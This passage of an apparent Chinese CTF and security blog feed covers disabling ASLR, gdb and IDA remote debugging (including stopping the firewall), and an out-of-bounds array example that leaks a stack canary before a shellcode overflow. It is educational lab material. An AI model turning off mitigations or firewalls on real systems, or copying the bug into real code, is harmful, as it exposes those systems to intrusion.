class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash"><span class="built_in">echo</span> 0 > /proc/sys/kernel/randomize_va_space</span></span><br></pre></td></tr></table></figure><p>注意,这里是先进root权限,后执行。不要问为什么sudo echo 0 > /proc/sys/kernel/randomize_va_space为什么会报错</p><p><strong>方法二: 使用sysctl控制ASLR</strong></p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$ </span><span class="language-bash">sysctl -w kernel.randomize_va_space=0</span></span><br></pre></td></tr></table></figure><p>这是一种<strong>临时改变</strong>随机策略的方法,重启之后将恢复默认。如果需要永久保存配置,需要在配置文件 /etc/sysctl.conf 中增加这个选项。</p><p><strong>方法三: 使用setarch控制单个程序的随机化</strong><br>如果你想历史关闭单个程序的ASLR,使用setarch是很好的选择。setarch命令如其名,改变程序的运行架构环境,并可以自定义环境flag。</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">setarch `uname -m` -R ./your_program</span><br></pre></td></tr></table></figure><p>-R参数代表关闭地址空间随机化(开启ADDR_NO_RANDOMIZE)</p><p><strong>方法四: 在GDB场景下,使用set disable-randomization off</strong><br>在调试特定程序时,可以通过 <code>set disable-randomization</code> 命令开启或者关闭地址空间随机化。默认是关闭随机化的,也就是on状态。</p><p>当然,这里开启,关闭和查看的方法看起来就比较正规了。</p><p>关闭ASLR:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set disable-randomization on</span><br></pre></td></tr></table></figure><p>开启ASLR:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set disable-randomization off</span><br></pre></td></tr></table></figure><p>查看ASLR状态:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show disable-randomization</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><p>[TOC]</p>
<blockquote>
<p>本文是我的另一篇文章的精简版,删除了参考文章,以及一些额外的解释,只保留了最关键的部分。如想学习写shellcode,可以去阅读 <a href="https://www.rgzzplus.com/2022/08/08/L</summary>
<category term="CTF" scheme="https://www.rgzzplus.com/categories/CTF/"/>
<category term="shellcode" scheme="https://www.rgzzplus.com/tags/shellcode/"/>
</entry>
<entry>
<title>gdb中x的用法</title>
<link href="https://www.rgzzplus.com/2022/09/06/gdb%E4%B8%ADx%E7%9A%84%E7%94%A8%E6%B3%95/"/>
<id>https://www.rgzzplus.com/2022/09/06/gdb%E4%B8%ADx%E7%9A%84%E7%94%A8%E6%B3%95/</id>
<published>2022-09-06T06:29:37.000Z</published>
<updated>2022-09-06T06:30:21.673Z</updated>
<content type="html"><![CDATA[<blockquote><p>本文转载自:<a href="https://www.jianshu.com/p/589308dd36dc">gdb ---- x命令详解</a></p><p>作者:Adam_0<br>链接:<a href="https://www.jianshu.com/p/589308dd36dc">https://www.jianshu.com/p/589308dd36dc</a><br>来源:简书</p></blockquote><p>examine命令缩写为x<br>格式:</p><figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">x/<span class="language-xml"><n/f/u></span> <addr></span><br></pre></td></tr></table></figure><figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">n:是正整数,表示需要显示的内存单元的个数,即从当前地址向后显示n个内存单元的内容,</span><br><span class="line">一个内存单元的大小由第三个参数u定义。</span><br><span class="line"></span><br><span class="line">f:表示addr指向的内存内容的输出格式,s对应输出字符串,此处需特别注意输出整型数据的格式:</span><br><span class="line"> x 按十六进制格式显示变量.</span><br><span class="line"> d 按十进制格式显示变量。</span><br><span class="line"> u 按十进制格式显示无符号整型。</span><br><span class="line"> o 按八进制格式显示变量。</span><br><span class="line"> t 按二进制格式显示变量。</span><br><span class="line"> a 按十六进制格式显示变量。</span><br><span class="line"> c 按字符格式显示变量。</span><br><span class="line"> f 按浮点数格式显示变量。</span><br><span class="line"> i 指令地址格式</span><br><span class="line"></span><br><span class="line">u:就是指以多少个字节作为一个内存单元-unit,默认为<span class="number">4</span>。u还可以用被一些字符表示:</span><br><span class="line"> 如b=<span class="number">1</span> <span class="built_in">byte</span>, h=<span class="number">2</span> bytes,w=<span class="number">4</span> bytes,g=<span class="number">8</span> bytes.</span><br><span class="line"></span><br><span class="line"><addr>:表示内存地址。</span><br><span class="line"><span class="function">Format letters are <span class="title">o</span>(<span class="params">octal</span>), <span class="title">x</span>(<span class="params">hex</span>), <span class="title">d</span>(<span class="params"><span class="built_in">decimal</span></span>), <span class="title">u</span>(<span class="params">unsigneddecimal</span>),</span></span><br><span class="line"><span class="function"><span class="title">t</span>(<span class="params">binary</span>), <span class="title">f</span>(<span class="params"><span class="built_in">float</span></span>), <span class="title">a</span>(<span class="params">address</span>), <span class="title">i</span>(<span class="params">instruction</span>), <span class="title">c</span>(<span class="params"><span class="built_in">char</span></span>) <span class="keyword">and</span> <span class="title">s</span>(<span class="params"><span class="built_in">string</span></span>).</span></span><br><span class="line"><span class="function">Size letters are <span class="title">b</span>(<span class="params"><span class="built_in">byte</span></span>), <span class="title">h</span>(<span class="params">halfword</span>), <span class="title">w</span>(<span class="params">word</span>), <span class="title">g</span>(<span class="params">giant, <span class="number">8b</span>ytes</span>)</span></span><br></pre></td></tr></table></figure><p><strong>举例:</strong><br>x/3uh buf<br>表示从内存地址buf读取内容,</p><p>3表示三个单位,<br>u表示按十六进制显示<br>h表示以双字节为一个单位</p>]]></content>
<summary type="html"><blockquote>
<p>本文转载自:<a href="https://www.jianshu.com/p/589308dd36dc">gdb ---- x命令详解</a></p>
<p>作者:Adam_0<br>
链接:<a href="https://www.jians</summary>
<category term="转载" scheme="https://www.rgzzplus.com/categories/%E8%BD%AC%E8%BD%BD/"/>
<category term="gdb" scheme="https://www.rgzzplus.com/tags/gdb/"/>
</entry>
<entry>
<title>安全论坛and博客</title>
<link href="https://www.rgzzplus.com/2022/09/05/%E5%AE%89%E5%85%A8%E5%AA%92%E4%BD%93or%E5%8D%9A%E5%AE%A2/"/>
<id>https://www.rgzzplus.com/2022/09/05/%E5%AE%89%E5%85%A8%E5%AA%92%E4%BD%93or%E5%8D%9A%E5%AE%A2/</id>
<published>2022-09-05T13:29:54.000Z</published>
<updated>2022-09-05T13:46:48.958Z</updated>
<content type="html"><![CDATA[<p>媒体:</p><ul><li><a href="https://www.cnblogs.com/">博客园</a></li><li><a href="https://bbs.pediy.com/">看雪</a></li><li><a href="https://www.blackhat.com/">blackhat</a></li><li><a href="https://www.bugku.com/forum.php">bugku</a></li><li><a href="http://www.icse-conferences.org/">ICSE</a></li><li><a href="https://geeknb.com/">极牛网</a></li><li><a href="https://bbs.kafan.cn/forum.php?mod=forumdisplay&fid=7&filter=typeid&typeid=31">卡饭论坛</a></li><li><a href="https://www.freebuf.com/">FREEBUF</a></li><li><a href="https://blogsurf.io/">Blog Surf</a></li><li><a href="http://phrack.org/issues/60/10.html">PHRACK</a></li><li><a href="https://www.anquanke.com/">安全客</a></li><li><a href="https://packetstormsecurity.com/">packet_storm</a></li><li><a href="https://www.cnhackteam.org/">黑客世界论坛</a></li><li><a href="https://www.t00ls.com/">tools</a></li><li><a href="https://xz.aliyun.com/">先知社区</a></li></ul><p>靶场:</p><ul><li><a href="https://adworld.xctf.org.cn/home/index">攻防世界</a></li><li><a href="https://ctf.bugku.com/index.html">CTF-bugku</a></li><li><a href="https://www.ctfhub.com/#/index">CTFhub</a></li><li><a href="https://book.nu1l.com/tasks/">从0到1:CTFer成长之路</a></li><li><a href="https://www.exploit-db.com/">Exploit Database</a></li><li><a href="http://www.shell-storm.org/shellcode/">shell-storm</a></li><li><a href="https://www.kancloud.cn/alex_wsc/android/506821"><strong>Android</strong></a></li></ul><p>博客:</p><ul><li><a href="https://www.cnblogs.com/2014asm/category/1310367.html">我是小三</a> ——pwn</li><li><a href="https://www.cnblogs.com/LY613313">爱喝奶茶的沐沐</a> ——pwn</li><li><a href="https://www.giantbranch.cn/">giantbranch</a> ——fuzzing</li><li><a href="https://www.jarvisw.com/">Jarvis</a> ——pwn</li><li><a href="https://jvns.ca/">Julia Evans</a> ——大佬</li><li><a href="https://www.onctf.com/"> 骁隆 </a> ——pwn+web</li><li><a href="https://v0w.top/">V0W’s Blog</a> ——web</li><li><a href="https://www.cnblogs.com/linuxsec/">linuxsec</a> ——web</li><li><a href="http://blog.rchapman.org/">瑞安·A·查普曼</a> ——大佬</li><li><a href="https://sploitfun.wordpress.com/">sploitF-U-N</a> ——pwn</li><li><a href="https://strcpy.me/">virusdefender’s blog</a> ——pwn</li><li><a href="http://www.fuzzysecurity.com/index.html">模糊安全</a> ——大佬们</li></ul><blockquote><p>其它博客推荐文章:</p><p><a href="https://zhuanlan.zhihu.com/p/23701240">https://zhuanlan.zhihu.com/p/23701240</a></p></blockquote>]]></content>
<summary type="html"><p>媒体:</p>
<ul>
<li><a href="https://www.cnblogs.com/">博客园</a></li>
<li><a href="https://bbs.pediy.com/">看雪</a></li>
<li><a href="https://ww</summary>
<category term="收藏夹" scheme="https://www.rgzzplus.com/categories/%E6%94%B6%E8%97%8F%E5%A4%B9/"/>
<category term="论坛&博客" scheme="https://www.rgzzplus.com/tags/%E8%AE%BA%E5%9D%9B-%E5%8D%9A%E5%AE%A2/"/>
</entry>
<entry>
<title>查看linux内核版本</title>
<link href="https://www.rgzzplus.com/2022/09/05/%E6%9F%A5%E7%9C%8Blinux%E5%86%85%E6%A0%B8%E7%89%88%E6%9C%AC/"/>
<id>https://www.rgzzplus.com/2022/09/05/%E6%9F%A5%E7%9C%8Blinux%E5%86%85%E6%A0%B8%E7%89%88%E6%9C%AC/</id>
<published>2022-09-05T13:28:04.000Z</published>
<updated>2022-09-05T13:46:39.722Z</updated>
<content type="html"><![CDATA[<blockquote><p>本文转载自:<a href="https://cloud.tencent.com/developer/article/1878840">Linux查看内核版本命令</a></p></blockquote><h2 id="使用uname命令查找linux内核"><a class="markdownIt-Anchor" href="#使用uname命令查找linux内核"></a> <strong>使用uname命令查找Linux内核</strong></h2><p>uname是用于获取系统信息的Linux命令。您也可以使用它来确定您使用的是32位还是64位系统。</p><p>打开一个终端并使用以下命令:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[linuxmi@linux:~/www.xxx.com]$ uname -r</span><br></pre></td></tr></table></figure><p>输出将类似于以下内容:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">5.3</span><span class="number">.0</span>-<span class="number">28</span>-generic</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><blockquote>
<p>本文转载自:<a href="https://cloud.tencent.com/developer/article/1878840">Linux查看内核版本命令</a></p>
</blockquote>
<h2 id="使用uname命令查找l</summary>
<category term="转载" scheme="https://www.rgzzplus.com/categories/%E8%BD%AC%E8%BD%BD/"/>
<category term="内核版本" scheme="https://www.rgzzplus.com/tags/%E5%86%85%E6%A0%B8%E7%89%88%E6%9C%AC/"/>
</entry>
<entry>
<title>linux软件安装包依赖问题</title>
<link href="https://www.rgzzplus.com/2022/09/05/linux%E8%BD%AF%E4%BB%B6%E5%AE%89%E8%A3%85%E5%8C%85%E4%BE%9D%E8%B5%96%E9%97%AE%E9%A2%98/"/>
<id>https://www.rgzzplus.com/2022/09/05/linux%E8%BD%AF%E4%BB%B6%E5%AE%89%E8%A3%85%E5%8C%85%E4%BE%9D%E8%B5%96%E9%97%AE%E9%A2%98/</id>
<published>2022-09-05T13:27:21.000Z</published>
<updated>2022-09-05T13:45:42.797Z</updated>
<content type="html"><![CDATA[<p>当我首次使用pwndbg的heap指令的时候:<br><img src="/2022/09/05/linux%E8%BD%AF%E4%BB%B6%E5%AE%89%E8%A3%85%E5%8C%85%E4%BE%9D%E8%B5%96%E9%97%AE%E9%A2%98/image-20220901192451610.png" alt="image-20220901192451610"></p><p>说是缺少依赖,需要我安装一些库文件</p><p>但是当我去安装这些库的时候却发生了依赖冲突<br><img src="/2022/09/05/linux%E8%BD%AF%E4%BB%B6%E5%AE%89%E8%A3%85%E5%8C%85%E4%BE%9D%E8%B5%96%E9%97%AE%E9%A2%98/image-20220901192638567.png" alt="image-20220901192638567"></p><p>发现,是我的libc6,太新了,需要安装回旧版本的库</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt-get install libc6=2.31-0kylin9.2</span><br></pre></td></tr></table></figure><p>安装完旧版本的库后,就能安装 libc6-dbg 啦!<br><img src="/2022/09/05/linux%E8%BD%AF%E4%BB%B6%E5%AE%89%E8%A3%85%E5%8C%85%E4%BE%9D%E8%B5%96%E9%97%AE%E9%A2%98/image-20220901192829669.png" alt="image-20220901192829669"></p><p>再去 heap,就能看到信息了<br><img src="/2022/09/05/linux%E8%BD%AF%E4%BB%B6%E5%AE%89%E8%A3%85%E5%8C%85%E4%BE%9D%E8%B5%96%E9%97%AE%E9%A2%98/image-20220901193217714.png" alt="image-20220901193217714"></p><blockquote><p>参考:<a href="https://www.cnblogs.com/EasonJim/p/7144017.html">查看指定软件所有版本</a></p></blockquote>]]></content>
<summary type="html"><p>当我首次使用pwndbg的heap指令的时候:<br>
<img src="/2022/09/05/linux%E8%BD%AF%E4%BB%B6%E5%AE%89%E8%A3%85%E5%8C%85%E4%BE%9D%E8%B5%96%E9%97%AE%E9%A2%98/</summary>
<category term="经验交流" scheme="https://www.rgzzplus.com/categories/%E7%BB%8F%E9%AA%8C%E4%BA%A4%E6%B5%81/"/>
<category term="安装包依赖" scheme="https://www.rgzzplus.com/tags/%E5%AE%89%E8%A3%85%E5%8C%85%E4%BE%9D%E8%B5%96/"/>
</entry>
<entry>
<title>数组越界访问</title>
<link href="https://www.rgzzplus.com/2022/09/05/%E6%95%B0%E7%BB%84%E8%B6%8A%E7%95%8C%E8%AE%BF%E9%97%AE/"/>
<id>https://www.rgzzplus.com/2022/09/05/%E6%95%B0%E7%BB%84%E8%B6%8A%E7%95%8C%E8%AE%BF%E9%97%AE/</id>
<published>2022-09-05T13:27:08.000Z</published>
<updated>2022-09-05T13:44:04.688Z</updated>
<content type="html"><![CDATA[<h1 id="1-数组越界"><a class="markdownIt-Anchor" href="#1-数组越界"></a> 1 数组越界</h1><p>先区分一下<strong>数组越界漏洞</strong>和<strong>溢出漏洞</strong>:</p><ul><li>数组越界访问包含读写类型</li><li>溢出属于数据写入</li><li>部分溢出漏洞本质确实就是数组越界漏洞。</li></ul><p>数组越界就像是倒水的时候倒错了杯子,溢出就像是水从杯子里溢出来。</p><h2 id="11-原理"><a class="markdownIt-Anchor" href="#11-原理"></a> 1.1 原理</h2><p><strong>堆中</strong>的数组越界: 因为堆是我们自己分配的,如果越界会把堆中其他空间的数据写掉或着读取其他空间的数据。如果是变量则会引起数值改变,如果是指针则可能会引起crash。</p><p><strong>栈中</strong>的数组越界:因为栈是向下增长的,进入函数前,会把参数和下一条指令地址压栈,如果覆盖了当前函数的ebp(栈底),那么栈还原时esp(栈顶)就不正确指向,从而发送未知错误(大部分是程序崩溃退出),ebp后面的返回地址也被覆盖那么程序执行流程则可被控制。</p><p>下面代码为例分析数组越界访问漏洞:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string"><stdio.h></span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span>{</span><br><span class="line"><span class="type">int</span> index;</span><br><span class="line"><span class="type">int</span> <span class="built_in">array</span>[<span class="number">3</span>] = {<span class="number">111</span>,<span class="number">222</span>,<span class="number">333</span>};</span><br><span class="line"></span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"输入数组索引下标:"</span>);</span><br><span class="line"><span class="built_in">scanf</span>(<span class="string">"%d"</span>,&index);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"输出数组元素:array[%d] = %d\n"</span>, index, <span class="built_in">array</span>[index]);</span><br><span class="line"> <span class="comment">//array[index] = 1;</span></span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>执行生成的程序,然后分别输入2 和 4 作为数组下标,输出结果如下,当输入的数组下标为 0、1、2 的时候,会得到正常数值,但是从索引3开始就超出了原来的数组 array 的范围,比如输入4,将会数组越界访问栈中的值,导致读取不在程序控制范围内的数值。</p><p><img src="/2022/09/05/%E6%95%B0%E7%BB%84%E8%B6%8A%E7%95%8C%E8%AE%BF%E9%97%AE/image-20220904162857184.png" alt="image-20220904162857184"></p><p>使用gdb调试发现array[4] 就是从 array 开始的第六个数据0x4012A9,已经读取到了array之外的数据,如果越界访问距离过大,就会访问到不可访问的内存空间,导致程序崩溃。</p><p>我们可以利用这种方式来取得栈上的 canary,进而绕过canary。</p><p><img src="/2022/09/05/%E6%95%B0%E7%BB%84%E8%B6%8A%E7%95%8C%E8%AE%BF%E9%97%AE/image-20220904162631275.png" alt="image-20220904162631275"></p><p><img src="/2022/09/05/%E6%95%B0%E7%BB%84%E8%B6%8A%E7%95%8C%E8%AE%BF%E9%97%AE/image-20220904162118330.png" alt="image-20220904162118330"></p><p>canary = 0x3dd8e70f8 =1037625103<sub>10</sub></p><p><img src="/2022/09/05/%E6%95%B0%E7%BB%84%E8%B6%8A%E7%95%8C%E8%AE%BF%E9%97%AE/image-20220904162735865.png" alt="image-20220904162735865"></p><p>这里我们已经取得了栈中 canary 的值,接下来只要通过栈溢出,进行覆盖,并把 canary 放入 [rbp-0x8] 就能控制程序去执行 shellcode 了。</p><p>0x9d5720fbb2e21300</p><blockquote><p>参数:</p><p><a href="https://bbs.pediy.com/thread-246490.htm">整数溢出+数组越界</a></p><p>漏洞战争</p></blockquote>]]></content>
<summary type="html"><h1 id="1-数组越界"><a class="markdownIt-Anchor" href="#1-数组越界"></a> 1 数组越界</h1>
<p>先区分一下<strong>数组越界漏洞</strong>和<strong>溢出漏洞</strong>:</p>
<ul></summary>
<category term="CTF" scheme="https://www.rgzzplus.com/categories/CTF/"/>
<category term="数组越界" scheme="https://www.rgzzplus.com/tags/%E6%95%B0%E7%BB%84%E8%B6%8A%E7%95%8C/"/>
</entry>
<entry>
<title>IDA远程调试</title>
<link href="https://www.rgzzplus.com/2022/09/05/IDA%E8%BF%9C%E7%A8%8B%E8%B0%83%E8%AF%95/"/>
<id>https://www.rgzzplus.com/2022/09/05/IDA%E8%BF%9C%E7%A8%8B%E8%B0%83%E8%AF%95/</id>
<published>2022-09-05T13:26:31.000Z</published>
<updated>2022-09-05T13:43:24.310Z</updated>
<content type="html"><![CDATA[<blockquote><p>参考:</p><p><a href="https://www.cnblogs.com/2014asm/p/10098005.html">linux漏洞分析入门笔记-栈溢出</a></p><p><a href="https://blog.csdn.net/u014101410/article/details/102853014">Windows下IDA远程调试Linux程序,无法连接</a></p></blockquote><blockquote><p>ida7.5</p><p>kylin v10</p></blockquote><h2 id="0x00环境配置"><a class="markdownIt-Anchor" href="#0x00环境配置"></a> 0x00:环境配置</h2><p>使用IDA远程调试Linux程序步骤如下:</p><p>\1. 在进行远程调试之前需要对Linux平台进行一些准备工作。在IDA的安装目录中的dbgsrv文件夹中,选择linux_server或者linux_serverx64复制到需要调试Linux程序所在的目录下。将复制过来的文件赋予执行权限chmod 777 linux_server*。执行该文件./linux_server或者./linux_server64。</p><p>\2. 在IDA中选择菜单Debugger-Run-Remote Linux debugger。如图。分别将程序所在位置,程序所在目录,参数(没有可不写),主机IP,主机端口,点击OK。相对路径路径要填写相对</p><p>linux_server或者linux_serverx64的相对路径。</p><p><img src="/2022/09/05/IDA%E8%BF%9C%E7%A8%8B%E8%B0%83%E8%AF%95/693524-20181210175845721-2080206661.jpg" alt="img"></p><p>图1</p><p><img src="/2022/09/05/IDA%E8%BF%9C%E7%A8%8B%E8%B0%83%E8%AF%95/693524-20181210180102331-1234975417.jpg" alt="img"></p><p>图2</p><p><img src="https://img2018.cnblogs.com/blog/693524/201812/693524-20181210180122795-1138987496.jpg" alt="img"></p><p>图3</p><p>\3. 此时,下关键函数下好断点后,即可进行动态调试,如下图:</p><p><img src="/2022/09/05/IDA%E8%BF%9C%E7%A8%8B%E8%B0%83%E8%AF%95/693524-20181210180219408-1171249507.jpg" alt="img"></p><p>图4</p><p>常用快捷键包括:</p><p>a. 单步步过:F8</p><p>b. 单步步入:F7</p><p>c. 执行到光标位置:F4</p><p>d. 设置断点:F2</p><p>e. 顺序执行:F9</p><h2 id="0x01-问题"><a class="markdownIt-Anchor" href="#0x01-问题"></a> 0x01 问题</h2><p>您在远程调试过程中,可能出现能ping通,但就是连不上的情况,这可能是因为您开启了防火墙。</p><p>centos从7开始默认用的是firewalld,这个是基于iptables的,虽然有iptables的核心,但是iptables的服务是没安装的。所以你只要停止firewalld服务即可:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo systemctl stop firewalld.service && sudo systemctl disable firewalld.service</span><br></pre></td></tr></table></figure><p>如果是其他的系统,在linux中关闭防火墙即可</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">service iptables stop</span><br></pre></td></tr></table></figure><p>ubuntu或者centos都可以用以上方法解决,如果是kali的话,获取到ip,直接sudo执行linux_server即可。</p>]]></content>
<summary type="html"><blockquote>
<p>参考:</p>
<p> <a href="https://www.cnblogs.com/2014asm/p/10098005.html">linux漏洞分析入门笔记-栈溢出</a></p>
<p> <a href="https://blo</summary>
<category term="经验交流" scheme="https://www.rgzzplus.com/categories/%E7%BB%8F%E9%AA%8C%E4%BA%A4%E6%B5%81/"/>
<category term="IDA" scheme="https://www.rgzzplus.com/tags/IDA/"/>
</entry>
<entry>
<title>linux安装ida</title>
<link href="https://www.rgzzplus.com/2022/09/05/linux%E5%AE%89%E8%A3%85ida/"/>
<id>https://www.rgzzplus.com/2022/09/05/linux%E5%AE%89%E8%A3%85ida/</id>
<published>2022-09-05T13:26:17.000Z</published>
<updated>2022-09-05T13:42:51.734Z</updated>
<content type="html"><![CDATA[<p>本文转载自:<strong><a href="https://github.com/AngelKitty/IDA7.0">安装IDA7.0</a></strong></p><p>以 Ubuntu18.04 为例。您可以将<a href="https://github.com/AngelKitty/IDA7.0/blob/master/idafree70_linux.run">idafree70_linux.run</a>下载到本地主机,然后使用以下命令安装 IDA。</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/AngelKitty/IDA7.0.git</span><br><span class="line">cd IDA7.0/</span><br><span class="line">chmod +x idafree70_linux.run</span><br><span class="line">./idafree70_linux.run</span><br></pre></td></tr></table></figure><p>如果您之前没有安装过 git,可以运行以下命令来获取 git。</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt-get install git</span><br></pre></td></tr></table></figure><p>下载完成后,在该目录下打开命令行,并运行 <code>./ida</code> ,进入安装步骤。</p><p>然后您必须单击“下一步”才能完成安装。遇到安装目录解决方案时,建议更改默认路径,然后选择<code>/opt/...</code>IDA要安装的目录。</p><p>然后创建一个指向该<code>/usr/bin</code>文件夹的符号链接。</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo ln -s /opt/idafree-7.0/ida64 /usr/bin</span><br></pre></td></tr></table></figure><p>然后你可以测试 ida64 命令,它应该可以工作。</p><p>也许你遇到了“Package ‘libstdc++.so.5’ has no installation Candidate”这样的问题,可以运行以下命令来解决。</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt-get install libstdc++5:i386</span><br></pre></td></tr></table></figure><p>然后你就可以开始你的ida之旅了。</p>]]></content>
<summary type="html"><p>本文转载自:<strong><a href="https://github.com/AngelKitty/IDA7.0">安装IDA7.0</a></strong></p>
<p>以 Ubuntu18.04 为例。您可以将<a href="https://github.co</summary>
<category term="转载" scheme="https://www.rgzzplus.com/categories/%E8%BD%AC%E8%BD%BD/"/>
<category term="IDA" scheme="https://www.rgzzplus.com/tags/IDA/"/>
</entry>
<entry>
<title>查看glibc版本号</title>
<link href="https://www.rgzzplus.com/2022/09/05/%E6%9F%A5%E7%9C%8Bglibc%E7%89%88%E6%9C%AC%E5%8F%B7/"/>
<id>https://www.rgzzplus.com/2022/09/05/%E6%9F%A5%E7%9C%8Bglibc%E7%89%88%E6%9C%AC%E5%8F%B7/</id>
<published>2022-09-05T13:26:04.000Z</published>
<updated>2022-09-05T13:34:31.809Z</updated>
<content type="html"><![CDATA[<blockquote><p>本文转载于:<a href="https://www.cnblogs.com/motadou/p/4473966.html">glibc查看版本号</a></p></blockquote><p>glibc是标准C库的GNU实现。我们采用C/C++所写的程序,运行时基本都依赖与它。如果我们想看当前机器glibc的源代码,首先需要知道当前机器glibc的版本号,然后到glibc的官网下载对应版本的源代码。</p><h3 id="查看当前机器glibc的版本号"><a class="markdownIt-Anchor" href="#查看当前机器glibc的版本号"></a> 查看当前机器glibc的版本号</h3><p>第一种方法:使用命令ldd,查看可执行程序依赖libc的路径。<br><img src="/2022/09/05/%E6%9F%A5%E7%9C%8Bglibc%E7%89%88%E6%9C%AC%E5%8F%B7/47736-20200424135401650-138960923.png" alt="img"><br>由上可知,系统采用的是libc-2.19.so的动态库,那么glibc的版本号是2.19。</p><p>第二种方法:执行libc.so查看输出的glibc编译信息,里面包含了版本号。<br><img src="/2022/09/05/%E6%9F%A5%E7%9C%8Bglibc%E7%89%88%E6%9C%AC%E5%8F%B7/47736-20200427101256592-1321326922.png" alt="img"></p><p>第三种方法:使用命令 ldd --version(ldd是glibc提供的命令,由此可知glibc的版本号)。<br><img src="/2022/09/05/%E6%9F%A5%E7%9C%8Bglibc%E7%89%88%E6%9C%AC%E5%8F%B7/47736-20200424135802159-1955290017.png" alt="img"></p><p>第四种方法:使用命令 getconf GNU_LIBC_VERSION。<br><img src="/2022/09/05/%E6%9F%A5%E7%9C%8Bglibc%E7%89%88%E6%9C%AC%E5%8F%B7/47736-20200424140519131-472352609.png" alt="img"></p><blockquote><p>下载glibc源代码</p><p>glibc官网地址:<a href="https://www.gnu.org/software/libc/">https://www.gnu.org/software/libc/</a><br>glibc源代码包:<a href="https://ftp.gnu.org/gnu/glibc/">https://ftp.gnu.org/gnu/glibc/</a></p></blockquote>]]></content>
<summary type="html"><blockquote>
<p>本文转载于:<a href="https://www.cnblogs.com/motadou/p/4473966.html">glibc查看版本号</a></p>
</blockquote>
<p>glibc是标准C库的GNU实现。我们采用C/C+</summary>
<category term="转载" scheme="https://www.rgzzplus.com/categories/%E8%BD%AC%E8%BD%BD/"/>
<category term="glibc版本号" scheme="https://www.rgzzplus.com/tags/glibc%E7%89%88%E6%9C%AC%E5%8F%B7/"/>
</entry>
<entry>
<title>Linux查看系统进程</title>
<link href="https://www.rgzzplus.com/2022/09/05/Linux%E6%9F%A5%E7%9C%8B%E7%B3%BB%E7%BB%9F%E8%BF%9B%E7%A8%8B/"/>
<id>https://www.rgzzplus.com/2022/09/05/Linux%E6%9F%A5%E7%9C%8B%E7%B3%BB%E7%BB%9F%E8%BF%9B%E7%A8%8B/</id>
<published>2022-09-05T13:25:27.000Z</published>
<updated>2022-09-05T13:33:47.013Z</updated>
<content type="html"><![CDATA[<p>本文转载于:<a href="https://cloud.tencent.com/developer/article/1711858">LINUX查看进程的4种方法(小结)</a></p><p>进程是在 CPU 及内存中运行的程序代码,而每个进程可以创建一个或多个进程(父子进程)。</p><p><strong>查看进程方法:</strong></p><p><strong>第一种:</strong></p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ps aux</span><br></pre></td></tr></table></figure><p>**ps命令用于报告当前系统的进程状态。**可以搭配kill指令随时中断、删除不必要的程序。ps命令是最基本同时也是非常强大的进程查看命令,使用该命令可以确定有哪些进程正在运行和运行的状态、进程是否结束、进程有没有僵死、哪些进程占用了过多的资源等等,总之大部分信息都是可以通过执行该命令得到的。</p><p>a:显示当前终端下的所有进程信息,包括其他用户的进程。</p><p>u:使用以用户为主的格式输出进程信息。</p><p>x:显示当前用户在所有终端下的进程。</p><p>示例:</p><p><img src="/2022/09/05/Linux%E6%9F%A5%E7%9C%8B%E7%B3%BB%E7%BB%9F%E8%BF%9B%E7%A8%8B/1620.png" alt="img"></p><p><strong>上图中各字段解释:</strong></p><p>USER:启动该进程的用户账号名称 PID:该进程的ID号,在当前系统中是唯一的 %CPU:CPU占用的百分比 